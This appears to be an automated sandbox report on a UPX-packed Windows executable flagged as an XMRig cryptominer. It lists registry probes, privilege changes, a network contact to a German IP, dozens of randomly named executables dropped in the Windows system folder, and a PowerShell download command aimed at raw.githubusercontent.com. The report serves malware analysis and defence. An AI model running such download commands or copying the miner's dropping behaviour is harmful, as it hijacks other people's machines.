Malware Analysis Report

2024-11-16 11:40

Sample ID 240612-h8wj6sthkf
Target 27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe
SHA256 dd544791357c65a69ea305c5eb7accee01b88c69708742ff53434e53675d20a6
Tags
xmrig execution miner upx
score
10/10

Analysis Overview

score
10/10

SHA256

dd544791357c65a69ea305c5eb7accee01b88c69708742ff53434e53675d20a6

Threat Level: Known bad

The file 27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

Xmrig family

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Checks processor information in registry

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 07:24

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 07:24

Reported

2024-06-12 07:27

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Processes

C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3748,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3960 /prefetch:8

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "220" "2524" "2456" "2528" "0" "0" "2532" "0" "0" "0" "0" "0"

C:\Windows\system32\dwm.exe

"dwm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp

Files


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 07:24

Reported

2024-06-12 07:27

Platform

win7-20240611-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\wYeQTqJ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\oIpESqS.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\tdOCnGi.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\aIwbPBR.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\QNjnpPS.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\qgOQVxV.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\RIqoXwV.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\QjVMIqG.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\reVUriJ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ejAFgsa.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\VSWzHQi.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\CsUfrnB.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\JYBZDDo.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\PtSOUAI.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\pNCpAtc.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\BBNJKpQ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\tpYKacW.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\lAaMpQc.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\sSKRRNX.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ritVNfB.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\lzfaaPu.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\euZrYwa.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target

Processes

C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\uWHlsTi.exe

C:\Windows\System\sUZdLCV.exe

C:\Windows\System\sUZdLCV.exe

C:\Windows\System\CksjqYk.exe

C:\Windows\System\CksjqYk.exe

C:\Windows\System\mPieZpv.exe

C:\Windows\System\mPieZpv.exe

C:\Windows\System\Ckupdzw.exe

C:\Windows\System\Ckupdzw.exe

C:\Windows\System\aAseMXF.exe

C:\Windows\System\aAseMXF.exe

C:\Windows\System\YpRKGep.exe

C:\Windows\System\YpRKGep.exe

C:\Windows\System\FUdeiSh.exe

C:\Windows\System\FUdeiSh.exe

C:\Windows\System\javBloj.exe

C:\Windows\System\javBloj.exe

C:\Windows\System\rUhwmqt.exe

C:\Windows\System\rUhwmqt.exe

C:\Windows\System\JYBZDDo.exe

C:\Windows\System\JYBZDDo.exe

C:\Windows\System\fvsoDmI.exe

C:\Windows\System\fvsoDmI.exe

C:\Windows\System\lfhOaVi.exe

C:\Windows\System\lfhOaVi.exe

C:\Windows\System\VfurbxY.exe

C:\Windows\System\VfurbxY.exe

C:\Windows\System\cIJBokk.exe

C:\Windows\System\cIJBokk.exe

C:\Windows\System\FioiYkW.exe

C:\Windows\System\FioiYkW.exe

C:\Windows\System\DHkWgkY.exe

C:\Windows\System\DHkWgkY.exe

C:\Windows\System\wttKpPM.exe

C:\Windows\System\wttKpPM.exe

C:\Windows\System\EAiZnfc.exe

C:\Windows\System\EAiZnfc.exe

C:\Windows\System\gsyCfee.exe

C:\Windows\System\gsyCfee.exe

C:\Windows\System\sthIqbu.exe

C:\Windows\System\sthIqbu.exe

C:\Windows\System\gETsSeH.exe

C:\Windows\System\gETsSeH.exe

C:\Windows\System\LDtdlaA.exe

C:\Windows\System\LDtdlaA.exe

C:\Windows\System\MlYTpcK.exe

C:\Windows\System\MlYTpcK.exe

C:\Windows\System\idPBYrx.exe

C:\Windows\System\idPBYrx.exe

C:\Windows\System\IUPAjvq.exe

C:\Windows\System\IUPAjvq.exe

C:\Windows\System\zBrfOhh.exe

C:\Windows\System\zBrfOhh.exe

C:\Windows\System\ijCMjHO.exe

C:\Windows\System\ijCMjHO.exe

C:\Windows\System\FvKMpQB.exe

C:\Windows\System\FvKMpQB.exe

C:\Windows\System\YVBcMyr.exe

C:\Windows\System\YVBcMyr.exe

C:\Windows\System\VXZOpjs.exe

C:\Windows\System\VXZOpjs.exe

C:\Windows\System\gblapnj.exe

C:\Windows\System\gblapnj.exe

C:\Windows\System\vVsOuUR.exe

C:\Windows\System\vVsOuUR.exe

C:\Windows\System\orghmpR.exe

C:\Windows\System\orghmpR.exe

C:\Windows\System\bttLIcO.exe

C:\Windows\System\bttLIcO.exe

C:\Windows\System\lrsiOBm.exe

C:\Windows\System\lrsiOBm.exe

C:\Windows\System\QGrRFpz.exe

C:\Windows\System\QGrRFpz.exe

C:\Windows\System\uOAPIke.exe

C:\Windows\System\uOAPIke.exe

C:\Windows\System\AltXKAb.exe

C:\Windows\System\AltXKAb.exe

C:\Windows\System\aZSxVtP.exe

C:\Windows\System\aZSxVtP.exe

C:\Windows\System\uTUIkbq.exe

C:\Windows\System\uTUIkbq.exe

C:\Windows\System\DFoelZS.exe

C:\Windows\System\DFoelZS.exe

C:\Windows\System\mcOQeRr.exe

C:\Windows\System\mcOQeRr.exe

C:\Windows\System\pQnkJEQ.exe

C:\Windows\System\pQnkJEQ.exe

C:\Windows\System\GuLpZSD.exe

C:\Windows\System\GuLpZSD.exe

C:\Windows\System\YcFOtJT.exe

C:\Windows\System\YcFOtJT.exe

C:\Windows\System\DSVaORu.exe

C:\Windows\System\DSVaORu.exe

C:\Windows\System\ZHHNPZw.exe

C:\Windows\System\ZHHNPZw.exe

C:\Windows\System\LhnuNrd.exe

C:\Windows\System\LhnuNrd.exe

C:\Windows\System\XWptAcT.exe

C:\Windows\System\XWptAcT.exe

C:\Windows\System\koDSuji.exe

C:\Windows\System\koDSuji.exe

C:\Windows\System\HibUllo.exe

C:\Windows\System\HibUllo.exe

C:\Windows\System\DphXYvP.exe

C:\Windows\System\DphXYvP.exe

C:\Windows\System\dgdjNod.exe

C:\Windows\System\dgdjNod.exe

C:\Windows\System\dUfQRXb.exe

C:\Windows\System\dUfQRXb.exe

C:\Windows\System\WgvSfxK.exe

C:\Windows\System\WgvSfxK.exe

C:\Windows\System\BUYBfYX.exe

C:\Windows\System\BUYBfYX.exe

C:\Windows\System\jYfvuJT.exe

C:\Windows\System\jYfvuJT.exe

C:\Windows\System\KfsJZVM.exe

C:\Windows\System\KfsJZVM.exe

C:\Windows\System\zbkTNLg.exe

C:\Windows\System\zbkTNLg.exe

C:\Windows\System\gwdiNDG.exe

C:\Windows\System\gwdiNDG.exe

C:\Windows\System\nxVGjpt.exe

C:\Windows\System\nxVGjpt.exe

C:\Windows\System\ImJsgWN.exe

C:\Windows\System\ImJsgWN.exe

C:\Windows\System\SFEJMSd.exe

C:\Windows\System\SFEJMSd.exe

C:\Windows\System\DGAmhMx.exe

C:\Windows\System\DGAmhMx.exe

C:\Windows\System\qiuUNQZ.exe

C:\Windows\System\qiuUNQZ.exe

C:\Windows\System\QMCnxPz.exe

C:\Windows\System\QMCnxPz.exe

C:\Windows\System\PucPrkR.exe

C:\Windows\System\PucPrkR.exe

C:\Windows\System\VVfItMK.exe

C:\Windows\System\VVfItMK.exe

C:\Windows\System\vkGwYhO.exe

C:\Windows\System\vkGwYhO.exe

C:\Windows\System\XncTAbT.exe

C:\Windows\System\XncTAbT.exe

C:\Windows\System\vVzycTI.exe

C:\Windows\System\vVzycTI.exe

C:\Windows\System\RYCyYqX.exe

C:\Windows\System\RYCyYqX.exe

C:\Windows\System\mCafhZk.exe

C:\Windows\System\mCafhZk.exe

C:\Windows\System\bWyUbBh.exe

C:\Windows\System\bWyUbBh.exe

C:\Windows\System\YrrIiCn.exe

C:\Windows\System\YrrIiCn.exe

C:\Windows\System\CXostKK.exe

C:\Windows\System\CXostKK.exe

C:\Windows\System\ofFPbzq.exe

C:\Windows\System\ofFPbzq.exe

C:\Windows\System\AuYsdRd.exe

C:\Windows\System\AuYsdRd.exe

C:\Windows\System\rGKewxh.exe

C:\Windows\System\rGKewxh.exe

C:\Windows\System\UbEuLRO.exe

C:\Windows\System\UbEuLRO.exe

C:\Windows\System\VQZkwuB.exe

C:\Windows\System\VQZkwuB.exe

C:\Windows\System\mYoCtsx.exe

C:\Windows\System\mYoCtsx.exe

C:\Windows\System\CoYohXc.exe

C:\Windows\System\CoYohXc.exe

C:\Windows\System\THiXBeG.exe

C:\Windows\System\THiXBeG.exe

C:\Windows\System\WWbsWmF.exe

C:\Windows\System\WWbsWmF.exe

C:\Windows\System\gjKkwRz.exe

C:\Windows\System\gjKkwRz.exe

C:\Windows\System\yTdUuTs.exe

C:\Windows\System\yTdUuTs.exe

C:\Windows\System\pwcKSbW.exe

C:\Windows\System\pwcKSbW.exe

C:\Windows\System\ajsrlHz.exe

C:\Windows\System\ajsrlHz.exe

C:\Windows\System\LUndXZv.exe

C:\Windows\System\LUndXZv.exe

C:\Windows\System\OjhDVrA.exe

C:\Windows\System\OjhDVrA.exe

C:\Windows\System\yJGnMXb.exe

C:\Windows\System\yJGnMXb.exe

C:\Windows\System\nIMqprO.exe

C:\Windows\System\nIMqprO.exe

C:\Windows\System\nalxJWV.exe

C:\Windows\System\nalxJWV.exe

C:\Windows\System\YQaaWJv.exe

C:\Windows\System\YQaaWJv.exe

C:\Windows\System\yXzEGnX.exe

C:\Windows\System\yXzEGnX.exe

C:\Windows\System\qcZmELx.exe

C:\Windows\System\qcZmELx.exe

C:\Windows\System\aNJKaVv.exe

C:\Windows\System\aNJKaVv.exe

C:\Windows\System\yfayRlq.exe

C:\Windows\System\yfayRlq.exe

C:\Windows\System\UMijzYv.exe

C:\Windows\System\UMijzYv.exe

C:\Windows\System\MMdqXoj.exe

C:\Windows\System\MMdqXoj.exe

C:\Windows\System\RIqoXwV.exe

C:\Windows\System\RIqoXwV.exe

C:\Windows\System\lvZtmZh.exe

C:\Windows\System\lvZtmZh.exe

C:\Windows\System\whMjPqI.exe

C:\Windows\System\whMjPqI.exe

C:\Windows\System\PAmwrlD.exe

C:\Windows\System\PAmwrlD.exe

C:\Windows\System\PNngCXp.exe

C:\Windows\System\PNngCXp.exe

C:\Windows\System\YuAAnmD.exe

C:\Windows\System\YuAAnmD.exe

C:\Windows\System\VuOUUbb.exe

C:\Windows\System\VuOUUbb.exe

C:\Windows\System\TwowKAy.exe

C:\Windows\System\TwowKAy.exe

C:\Windows\System\jUNjAHF.exe

C:\Windows\System\jUNjAHF.exe

C:\Windows\System\VrsXzbU.exe

C:\Windows\System\VrsXzbU.exe

C:\Windows\System\CiyrQbq.exe

C:\Windows\System\CiyrQbq.exe

C:\Windows\System\PTcNTLN.exe

C:\Windows\System\PTcNTLN.exe

C:\Windows\System\PdPiBWO.exe

C:\Windows\System\PdPiBWO.exe

C:\Windows\System\lKuAwGf.exe

C:\Windows\System\lKuAwGf.exe

C:\Windows\System\bEsRFgS.exe

C:\Windows\System\bEsRFgS.exe

C:\Windows\System\GUMXxHv.exe

C:\Windows\System\GUMXxHv.exe

C:\Windows\System\AqLzKlu.exe

C:\Windows\System\AqLzKlu.exe

C:\Windows\System\gOKudeq.exe

C:\Windows\System\gOKudeq.exe

C:\Windows\System\LaFkKFR.exe

C:\Windows\System\LaFkKFR.exe

C:\Windows\System\addJmcX.exe

C:\Windows\System\addJmcX.exe

C:\Windows\System\JtThakv.exe

C:\Windows\System\JtThakv.exe

C:\Windows\System\xlyeOry.exe

C:\Windows\System\xlyeOry.exe

C:\Windows\System\VKkLvbt.exe

C:\Windows\System\VKkLvbt.exe

C:\Windows\System\anQWdbm.exe

C:\Windows\System\anQWdbm.exe

C:\Windows\System\JNaZxOw.exe

C:\Windows\System\JNaZxOw.exe

C:\Windows\System\VhBZlcO.exe

C:\Windows\System\VhBZlcO.exe

C:\Windows\System\YiJcgOz.exe

C:\Windows\System\YiJcgOz.exe

C:\Windows\System\zGFizqe.exe

C:\Windows\System\zGFizqe.exe

C:\Windows\System\xRMSBuC.exe

C:\Windows\System\xRMSBuC.exe

C:\Windows\System\nhqqbVP.exe

C:\Windows\System\nhqqbVP.exe

C:\Windows\System\WYIBiAi.exe

C:\Windows\System\WYIBiAi.exe

C:\Windows\System\fkVXaNj.exe

C:\Windows\System\fkVXaNj.exe

C:\Windows\System\GZkcoVt.exe

C:\Windows\System\GZkcoVt.exe

C:\Windows\System\PzkRPVE.exe

C:\Windows\System\PzkRPVE.exe

C:\Windows\System\eJyPxng.exe

C:\Windows\System\eJyPxng.exe

C:\Windows\System\GyykFnI.exe

C:\Windows\System\GyykFnI.exe

C:\Windows\System\mmTNrLb.exe

C:\Windows\System\mmTNrLb.exe

C:\Windows\System\kfThHMG.exe

C:\Windows\System\kfThHMG.exe

C:\Windows\System\oJeUNem.exe

C:\Windows\System\oJeUNem.exe

C:\Windows\System\nyWbVXb.exe

C:\Windows\System\nyWbVXb.exe

C:\Windows\System\wDYXHIt.exe

C:\Windows\System\wDYXHIt.exe

C:\Windows\System\DkvwEaN.exe

C:\Windows\System\DkvwEaN.exe

C:\Windows\System\hzCzIbb.exe

C:\Windows\System\hzCzIbb.exe

C:\Windows\System\YgzeISX.exe

C:\Windows\System\YgzeISX.exe

C:\Windows\System\GbhqXdz.exe

C:\Windows\System\GbhqXdz.exe

C:\Windows\System\kEArtJx.exe

C:\Windows\System\kEArtJx.exe

C:\Windows\System\nPGJgkU.exe

C:\Windows\System\nPGJgkU.exe

C:\Windows\System\RApgRAf.exe

C:\Windows\System\RApgRAf.exe

C:\Windows\System\ZmJqAOB.exe

C:\Windows\System\ZmJqAOB.exe

C:\Windows\System\VSWPaOq.exe

C:\Windows\System\VSWPaOq.exe

C:\Windows\System\oOlAKpS.exe

C:\Windows\System\oOlAKpS.exe

C:\Windows\System\qpDRCMp.exe

C:\Windows\System\qpDRCMp.exe

C:\Windows\System\ZFyiYUj.exe

C:\Windows\System\ZFyiYUj.exe

C:\Windows\System\jWWvlSt.exe

C:\Windows\System\jWWvlSt.exe

C:\Windows\System\FuhlqyL.exe

C:\Windows\System\FuhlqyL.exe

C:\Windows\System\VTgpsWd.exe

C:\Windows\System\VTgpsWd.exe

C:\Windows\System\wYeQTqJ.exe

C:\Windows\System\wYeQTqJ.exe

C:\Windows\System\fqpcEDY.exe

C:\Windows\System\fqpcEDY.exe

C:\Windows\System\tUbunMo.exe

C:\Windows\System\tUbunMo.exe

C:\Windows\System\OPQJnVO.exe

C:\Windows\System\OPQJnVO.exe

C:\Windows\System\QDHEQiB.exe

C:\Windows\System\QDHEQiB.exe

C:\Windows\System\DhFXaLI.exe

C:\Windows\System\DhFXaLI.exe

C:\Windows\System\ngYzKmN.exe

C:\Windows\System\ngYzKmN.exe

C:\Windows\System\beLhIjX.exe

C:\Windows\System\beLhIjX.exe

C:\Windows\System\KoFyeNW.exe

C:\Windows\System\KoFyeNW.exe

C:\Windows\System\diLvbzr.exe

C:\Windows\System\diLvbzr.exe

C:\Windows\System\lONqtLe.exe

C:\Windows\System\lONqtLe.exe

C:\Windows\System\UxwUoqa.exe

C:\Windows\System\UxwUoqa.exe

C:\Windows\System\tcCDOxD.exe

C:\Windows\System\tcCDOxD.exe

C:\Windows\System\WAfZnXZ.exe

C:\Windows\System\WAfZnXZ.exe

C:\Windows\System\bTvVQDX.exe

C:\Windows\System\bTvVQDX.exe

C:\Windows\System\uXxfhUt.exe

C:\Windows\System\uXxfhUt.exe

C:\Windows\System\sNpVrPC.exe

C:\Windows\System\sNpVrPC.exe

C:\Windows\System\oUNqjYM.exe

C:\Windows\System\oUNqjYM.exe

C:\Windows\System\lgzUItv.exe

C:\Windows\System\lgzUItv.exe

C:\Windows\System\FOmPPeH.exe

C:\Windows\System\FOmPPeH.exe

C:\Windows\System\gRBxdda.exe

C:\Windows\System\gRBxdda.exe

C:\Windows\System\rmaxMVa.exe

C:\Windows\System\rmaxMVa.exe

C:\Windows\System\VdquacG.exe

C:\Windows\System\VdquacG.exe

C:\Windows\System\OzZoSYZ.exe

C:\Windows\System\OzZoSYZ.exe

C:\Windows\System\jfgGekg.exe

C:\Windows\System\jfgGekg.exe

C:\Windows\System\EXcNcXc.exe

C:\Windows\System\EXcNcXc.exe

C:\Windows\System\iMsAPLb.exe

C:\Windows\System\iMsAPLb.exe

C:\Windows\System\DveLeer.exe

C:\Windows\System\DveLeer.exe

C:\Windows\System\KEOnXbf.exe

C:\Windows\System\KEOnXbf.exe

C:\Windows\System\MbZbZke.exe

C:\Windows\System\MbZbZke.exe

C:\Windows\System\jlrOKZR.exe

C:\Windows\System\jlrOKZR.exe

C:\Windows\System\gaofemb.exe

C:\Windows\System\gaofemb.exe

C:\Windows\System\zfXKgLx.exe

C:\Windows\System\zfXKgLx.exe

C:\Windows\System\aDEBOmr.exe

C:\Windows\System\aDEBOmr.exe

C:\Windows\System\pxIqVaU.exe

C:\Windows\System\pxIqVaU.exe

C:\Windows\System\mjtWicA.exe

C:\Windows\System\mjtWicA.exe

C:\Windows\System\zYIsxpn.exe

C:\Windows\System\zYIsxpn.exe

C:\Windows\System\wUhVmjH.exe

C:\Windows\System\wUhVmjH.exe

C:\Windows\System\mAvVbgC.exe

C:\Windows\System\mAvVbgC.exe

C:\Windows\System\sQqzGOr.exe

C:\Windows\System\sQqzGOr.exe

C:\Windows\System\NKGWSZl.exe

C:\Windows\System\NKGWSZl.exe

C:\Windows\System\FDgqGBe.exe

C:\Windows\System\FDgqGBe.exe

C:\Windows\System\guINQUD.exe

C:\Windows\System\guINQUD.exe

C:\Windows\System\tkVQxxx.exe

C:\Windows\System\tkVQxxx.exe

